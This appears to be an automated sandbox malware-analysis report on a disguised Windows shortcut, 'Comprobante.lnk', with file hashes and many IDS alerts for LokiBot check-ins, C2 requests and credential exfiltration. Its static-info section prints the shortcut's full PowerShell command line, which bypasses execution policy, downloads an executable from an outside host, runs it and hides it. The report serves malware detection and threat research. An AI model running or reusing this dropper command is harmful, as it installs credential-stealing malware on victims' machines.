Preview:	...................................FL..................F.`.. ...=FSc\|....3.d....r.d................................P.O. .:i.....+00.:...:..,.LB.)...A&...&.........z...{.Le\|....3.d.....t.2.....CY.: .COMPRO~1.LNK..X......EW*YCY.:..........................'./.C.o.m.p.r.o.b.a.n.t.e...l.n.k...l.n.k.......Y...............-.......X....................C:\Users\user\Desktop\Comprobante.lnk.lnk.. .c.:.\.w.i.n.d.o.w.s.\.s.y.s.t.e.m.3.2.\.p.e.r.f.i.0.0.9...d.a.t.........%SystemRoot%\system32\perfi009.dat..................................................................................................................................................................................................................................%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.p.e.r.f.i.0.0.9...d.a.t........................................................................................................................................................................................................

C:\Users\user\Desktop\mjtjewi.exe

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	371712
Entropy (8bit):	7.854168969155107
Encrypted:	false
SSDEEP:	6144:Mt0VqnKoq12xV+0+LGQ3orU7K9ORPCfQzyI4w2Q8y7tRQG9oeGdwpx6sqyqqQlh4:MIqnJV+3GTQVzZ+MXf6Ex6sqyqqQlhcl
MD5:	DB94D5DF4ADD0A06F261EAE73C2DA5DB
SHA1:	A37FFECD4004127C3EE2E4ED8F2E5D507C418DC1
SHA-256:	8CF4CC35E623A326F1B5FE4892F5D5E44272925F33B7439E675EDFC81BA2AF70
SHA-512:	8FC3F52D241CD06DB33BCC6FB85564A4FD3EE171E154162B2FB5B1C8E63216CD0F470EBE9DDC1D5E093B4713E1E93DF33D696EED0258D89E3A33B68D47B3CC67
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...QA.f............................. ... ... ....@.. .......................@............`.................................$'..W.......8............................................................................ ............... ..H...........j1CM!e^U..... ......................@....text....... ...................... ..`.rsrc...8...........................@..@.reloc..............................@..B............. ...................... ..`........................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	MS Windows shortcut, Item id list present, Has Description string, Has Relative path, Has command line arguments, Icon number=0, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=hide
Entropy (8bit):	2.8522775336366517
TrID:	Windows Shortcut (20020/1) 100.00%
File name:	Comprobante.lnk.lnk
File size:	2'538 bytes
MD5:	b234c46d1f63b18ad2dc3f824bc0d6fa
SHA1:	fbdcce6b33b9e0ffbba48aadca0db9059af37141
SHA256:	8cd7bd86c1cc1be6d0c553fc3e8e02232b70363fadc3212989b1599a70c668d3
SHA512:	883b59b949966ac9a4b04f51a5298f842b94c80423dec3dd35105c4c61724cde142b7a781a8fab9da32c6748e4d205af7c74f1acd09388f5d19600ac8da97883
SSDEEP:	24:8z/BHYVKVWzO+/CWXHiyQebPE+g1rwpTukQsCXrSZo9ufoYZa4o0oYh5/:8z5a5LE+g1r0qkQL4o96oK
TLSH:	A55124145BFA0320E6F78B3968BAF741897A7C65FE22CB8D0150918C1C75651E871F3B
File Content Preview:	L..................F.@...........................................................P.O. .:i.....+00.../C:\...................V.1...........Windows.@.............................................W.i.n.d.o.w.s.....Z.1...........System32..B.....................

File Icon


Icon Hash:	74f0e4e4e4e1e1ed

Static Windows Shortcut Info

General
Relative Path:	..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command Line Argument:	-ExecutionPolicy Bypass -WindowStyle Hidden -Command OpenWith.exe;(new-object System.Net.WebClient).DownloadFile('https://www.sodiumlaurethsulfatedesyroyer.com/flow/sfdkavhbsfvhahlbfabreaireuafrgfyarfdkabrbfvakysrgfea/zdhkbgualsbifbAFRAWYEGFYAUGEYGywefafaer/nezfdio.pif','mjtjewi.exe');./'mjtjewi.exe';(get-item 'mjtjewi.exe').Attributes += 'Hidden';
Icon location:	c:\windows\system32\perfi009.dat

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-03T09:20:32.181025+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.11	64437	TCP
2024-10-03T09:20:32.181025+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.11	64368	TCP
2024-10-03T09:20:32.181025+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.11	64388	TCP
2024-10-03T09:20:32.181025+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.11	49717	TCP
2024-10-03T09:20:32.181025+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.11	64348	TCP
2024-10-03T09:20:32.181025+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.11	64371	TCP
2024-10-03T09:20:32.181025+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.11	49718	TCP
2024-10-03T09:20:48.138102+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.11	49711	45.149.241.169	80	TCP
2024-10-03T09:20:48.138102+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.11	49711	45.149.241.169	80	TCP
2024-10-03T09:20:48.138102+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.11	49711	45.149.241.169	80	TCP
2024-10-03T09:20:49.077565+0200	2024312	ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1	1	192.168.2.11	49711	45.149.241.169	80	TCP
2024-10-03T09:20:49.427132+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.11	49712	45.149.241.169	80	TCP
2024-10-03T09:20:49.427132+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.11	49712	45.149.241.169	80	TCP
2024-10-03T09:20:49.427132+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.11	49712	45.149.241.169	80	TCP
2024-10-03T09:20:50.285873+0200	2024312	ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1	1	192.168.2.11	49712	45.149.241.169	80	TCP
2024-10-03T09:20:50.395968+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.11	49713	45.149.241.169	80	TCP
2024-10-03T09:20:50.395968+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.11	49713	45.149.241.169	80	TCP
2024-10-03T09:20:50.395968+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.11	49713	45.149.241.169	80	TCP
2024-10-03T09:20:51.444637+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.11	49713	45.149.241.169	80	TCP
2024-10-03T09:20:51.444637+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.11	49713	45.149.241.169	80	TCP
2024-10-03T09:20:51.445072+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.11	49713	TCP
2024-10-03T09:20:52.138116+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.11	49714	45.149.241.169	80	TCP
2024-10-03T09:20:52.138116+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.11	49714	45.149.241.169	80	TCP
2024-10-03T09:20:52.138116+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.11	49714	45.149.241.169	80	TCP
2024-10-03T09:20:52.895647+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.11	49714	45.149.241.169	80	TCP
2024-10-03T09:20:52.895647+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.11	49714	45.149.241.169	80	TCP
2024-10-03T09:20:52.900738+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.11	49714	TCP
2024-10-03T09:20:53.059614+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.11	49715	45.149.241.169	80	TCP
2024-10-03T09:20:53.059614+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.11	49715	45.149.241.169	80	TCP
2024-10-03T09:20:53.059614+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.11	49715	45.149.241.169	80	TCP
2024-10-03T09:20:55.154508+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.11	49715	45.149.241.169	80	TCP
2024-10-03T09:20:55.154508+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.11	49715	45.149.241.169	80	TCP
2024-10-03T09:20:55.160370+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.11	49715	TCP
2024-10-03T09:20:55.313220+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.11	49717	45.149.241.169	80	TCP
2024-10-03T09:20:55.313220+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.11	49717	45.149.241.169	80	TCP
2024-10-03T09:20:55.313220+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.11	49717	45.149.241.169	80	TCP
2024-10-03T09:20:56.378201+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.11	49717	45.149.241.169	80	TCP
2024-10-03T09:20:56.378201+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.11	49717	45.149.241.169	80	TCP
2024-10-03T09:20:56.544536+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.11	49718	45.149.241.169	80	TCP
2024-10-03T09:20:56.544536+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.11	49718	45.149.241.169	80	TCP
2024-10-03T09:20:56.544536+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.11	49718	45.149.241.169	80	TCP
2024-10-03T09:20:57.546571+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.11	49718	45.149.241.169	80	TCP
2024-10-03T09:20:57.546571+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.11	49718	45.149.241.169	80	TCP
2024-10-03T09:20:58.316168+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.11	55843	45.149.241.169	80	TCP
2024-10-03T09:20:58.316168+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.11	55843	45.149.241.169	80	TCP
2024-10-03T09:20:58.316168+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.11	55843	45.149.241.169	80	TCP
2024-10-03T09:20:59.117485+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.11	55843	45.149.241.169	80	TCP
2024-10-03T09:20:59.117485+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.11	55843	45.149.241.169	80	TCP
2024-10-03T09:20:59.122929+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.11	55843	TCP
2024-10-03T09:20:59.272737+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.11	64348	45.149.241.169	80	TCP
2024-10-03T09:20:59.272737+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.11	64348	45.149.241.169	80	TCP
2024-10-03T09:20:59.272737+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.11	64348	45.149.241.169	80	TCP
2024-10-03T09:21:00.355678+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.11	64348	45.149.241.169	80	TCP
2024-10-03T09:21:00.355678+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.11	64348	45.149.241.169	80	TCP
2024-10-03T09:21:00.670903+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.11	64350	45.149.241.169	80	TCP
2024-10-03T09:21:00.670903+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.11	64350	45.149.241.169	80	TCP
2024-10-03T09:21:00.670903+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.11	64350	45.149.241.169	80	TCP
2024-10-03T09:21:01.453898+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.11	64350	45.149.241.169	80	TCP
2024-10-03T09:21:01.453898+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.11	64350	45.149.241.169	80	TCP
2024-10-03T09:21:01.459279+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.11	64350	TCP
2024-10-03T09:21:01.623467+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.11	64352	45.149.241.169	80	TCP
2024-10-03T09:21:01.623467+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.11	64352	45.149.241.169	80	TCP
2024-10-03T09:21:01.623467+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.11	64352	45.149.241.169	80	TCP
2024-10-03T09:21:02.292636+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.11	64352	45.149.241.169	80	TCP
2024-10-03T09:21:02.292636+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.11	64352	45.149.241.169	80	TCP
2024-10-03T09:21:02.297469+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.11	64352	TCP
2024-10-03T09:21:02.448704+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.11	64354	45.149.241.169	80	TCP
2024-10-03T09:21:02.448704+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.11	64354	45.149.241.169	80	TCP
2024-10-03T09:21:02.448704+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.11	64354	45.149.241.169	80	TCP
2024-10-03T09:21:03.191952+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.11	64354	45.149.241.169	80	TCP
2024-10-03T09:21:03.191952+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.11	64354	45.149.241.169	80	TCP
2024-10-03T09:21:03.202516+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.11	64354	TCP
2024-10-03T09:21:03.488048+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.11	64355	45.149.241.169	80	TCP
2024-10-03T09:21:03.488048+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.11	64355	45.149.241.169	80	TCP
2024-10-03T09:21:03.488048+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.11	64355	45.149.241.169	80	TCP
2024-10-03T09:21:04.262865+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.11	64355	45.149.241.169	80	TCP
2024-10-03T09:21:04.262865+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.11	64355	45.149.241.169	80	TCP
2024-10-03T09:21:04.268373+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.11	64355	TCP
2024-10-03T09:21:04.428362+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.11	64357	45.149.241.169	80	TCP
2024-10-03T09:21:04.428362+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.11	64357	45.149.241.169	80	TCP
2024-10-03T09:21:04.428362+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.11	64357	45.149.241.169	80	TCP
2024-10-03T09:21:05.200763+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.11	64357	45.149.241.169	80	TCP
2024-10-03T09:21:05.200763+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.11	64357	45.149.241.169	80	TCP
2024-10-03T09:21:05.205632+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.11	64357	TCP
2024-10-03T09:21:05.363793+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.11	64358	45.149.241.169	80	TCP
2024-10-03T09:21:05.363793+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.11	64358	45.149.241.169	80	TCP
2024-10-03T09:21:05.363793+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.11	64358	45.149.241.169	80	TCP
2024-10-03T09:21:06.209342+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.11	64358	45.149.241.169	80	TCP
2024-10-03T09:21:06.209342+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.11	64358	45.149.241.169	80	TCP
2024-10-03T09:21:06.216904+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.11	64358	TCP
2024-10-03T09:21:06.386274+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.11	64359	45.149.241.169	80	TCP
2024-10-03T09:21:06.386274+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.11	64359	45.149.241.169	80	TCP
2024-10-03T09:21:06.386274+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.11	64359	45.149.241.169	80	TCP
2024-10-03T09:21:07.095755+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.11	64359	45.149.241.169	80	TCP
2024-10-03T09:21:07.095755+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.11	64359	45.149.241.169	80	TCP
2024-10-03T09:21:07.101687+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.11	64359	TCP
2024-10-03T09:21:07.265208+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.11	64360	45.149.241.169	80	TCP
2024-10-03T09:21:07.265208+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.11	64360	45.149.241.169	80	TCP
2024-10-03T09:21:07.265208+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.11	64360	45.149.241.169	80	TCP
2024-10-03T09:21:08.058000+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.11	64360	45.149.241.169	80	TCP
2024-10-03T09:21:08.058000+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.11	64360	45.149.241.169	80	TCP
2024-10-03T09:21:08.062889+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.11	64360	TCP
2024-10-03T09:21:08.224949+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.11	64361	45.149.241.169	80	TCP
2024-10-03T09:21:08.224949+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.11	64361	45.149.241.169	80	TCP
2024-10-03T09:21:08.224949+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.11	64361	45.149.241.169	80	TCP
2024-10-03T09:21:08.908970+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.11	64361	45.149.241.169	80	TCP
2024-10-03T09:21:08.908970+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.11	64361	45.149.241.169	80	TCP
2024-10-03T09:21:08.918941+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.11	64361	TCP
2024-10-03T09:21:09.172629+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.11	64362	45.149.241.169	80	TCP
2024-10-03T09:21:09.172629+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.11	64362	45.149.241.169	80	TCP
2024-10-03T09:21:09.172629+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.11	64362	45.149.241.169	80	TCP
2024-10-03T09:21:09.839583+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.11	64362	45.149.241.169	80	TCP
2024-10-03T09:21:09.839583+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.11	64362	45.149.241.169	80	TCP
2024-10-03T09:21:09.844424+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.11	64362	TCP
2024-10-03T09:21:09.997521+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.11	64363	45.149.241.169	80	TCP
2024-10-03T09:21:09.997521+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.11	64363	45.149.241.169	80	TCP
2024-10-03T09:21:09.997521+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.11	64363	45.149.241.169	80	TCP
2024-10-03T09:21:10.836642+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.11	64363	45.149.241.169	80	TCP
2024-10-03T09:21:10.836642+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.11	64363	45.149.241.169	80	TCP
2024-10-03T09:21:10.841978+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.11	64363	TCP
2024-10-03T09:21:10.996788+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.11	64364	45.149.241.169	80	TCP
2024-10-03T09:21:10.996788+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.11	64364	45.149.241.169	80	TCP
2024-10-03T09:21:10.996788+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.11	64364	45.149.241.169	80	TCP
2024-10-03T09:21:11.918002+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.11	64364	45.149.241.169	80	TCP
2024-10-03T09:21:11.918002+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.11	64364	45.149.241.169	80	TCP
2024-10-03T09:21:11.926165+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.11	64364	TCP
2024-10-03T09:21:12.112321+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.11	64365	45.149.241.169	80	TCP
2024-10-03T09:21:12.112321+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.11	64365	45.149.241.169	80	TCP
2024-10-03T09:21:12.112321+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.11	64365	45.149.241.169	80	TCP
2024-10-03T09:21:12.880481+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.11	64365	45.149.241.169	80	TCP
2024-10-03T09:21:12.880481+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.11	64365	45.149.241.169	80	TCP
2024-10-03T09:21:12.885827+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.11	64365	TCP
2024-10-03T09:21:13.055508+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.11	64366	45.149.241.169	80	TCP
2024-10-03T09:21:13.055508+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.11	64366	45.149.241.169	80	TCP
2024-10-03T09:21:13.055508+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.11	64366	45.149.241.169	80	TCP
2024-10-03T09:21:13.766337+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.11	64366	45.149.241.169	80	TCP
2024-10-03T09:21:13.766337+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.11	64366	45.149.241.169	80	TCP
2024-10-03T09:21:13.771289+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.11	64366	TCP
2024-10-03T09:21:13.916854+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.11	64367	45.149.241.169	80	TCP
2024-10-03T09:21:13.916854+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.11	64367	45.149.241.169	80	TCP
2024-10-03T09:21:13.916854+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.11	64367	45.149.241.169	80	TCP
2024-10-03T09:21:14.575323+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.11	64367	45.149.241.169	80	TCP
2024-10-03T09:21:14.575323+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.11	64367	45.149.241.169	80	TCP
2024-10-03T09:21:14.606299+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.11	64367	TCP
2024-10-03T09:21:14.881238+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.11	64368	45.149.241.169	80	TCP
2024-10-03T09:21:14.881238+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.11	64368	45.149.241.169	80	TCP
2024-10-03T09:21:14.881238+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.11	64368	45.149.241.169	80	TCP
2024-10-03T09:21:15.899147+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.11	64368	45.149.241.169	80	TCP
2024-10-03T09:21:15.899147+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.11	64368	45.149.241.169	80	TCP
2024-10-03T09:21:16.059969+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.11	64369	45.149.241.169	80	TCP
2024-10-03T09:21:16.059969+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.11	64369	45.149.241.169	80	TCP
2024-10-03T09:21:16.059969+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.11	64369	45.149.241.169	80	TCP
2024-10-03T09:21:16.915649+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.11	64369	45.149.241.169	80	TCP
2024-10-03T09:21:16.915649+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.11	64369	45.149.241.169	80	TCP
2024-10-03T09:21:16.922230+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.11	64369	TCP
2024-10-03T09:21:17.083633+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.11	64370	45.149.241.169	80	TCP
2024-10-03T09:21:17.083633+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.11	64370	45.149.241.169	80	TCP
2024-10-03T09:21:17.083633+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.11	64370	45.149.241.169	80	TCP
2024-10-03T09:21:17.866524+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.11	64370	45.149.241.169	80	TCP
2024-10-03T09:21:17.866524+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.11	64370	45.149.241.169	80	TCP
2024-10-03T09:21:17.872168+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.11	64370	TCP
2024-10-03T09:21:18.023488+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.11	64371	45.149.241.169	80	TCP
2024-10-03T09:21:18.023488+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.11	64371	45.149.241.169	80	TCP
2024-10-03T09:21:18.023488+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.11	64371	45.149.241.169	80	TCP
2024-10-03T09:21:19.008215+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.11	64371	45.149.241.169	80	TCP
2024-10-03T09:21:19.008215+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.11	64371	45.149.241.169	80	TCP
2024-10-03T09:21:19.175709+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.11	64372	45.149.241.169	80	TCP
2024-10-03T09:21:19.175709+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.11	64372	45.149.241.169	80	TCP
2024-10-03T09:21:19.175709+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.11	64372	45.149.241.169	80	TCP
2024-10-03T09:21:21.428539+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.11	64372	45.149.241.169	80	TCP
2024-10-03T09:21:21.428539+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.11	64372	45.149.241.169	80	TCP
2024-10-03T09:21:21.433380+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.11	64372	TCP
2024-10-03T09:21:21.592824+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.11	64373	45.149.241.169	80	TCP
2024-10-03T09:21:21.592824+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.11	64373	45.149.241.169	80	TCP
2024-10-03T09:21:21.592824+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.11	64373	45.149.241.169	80	TCP
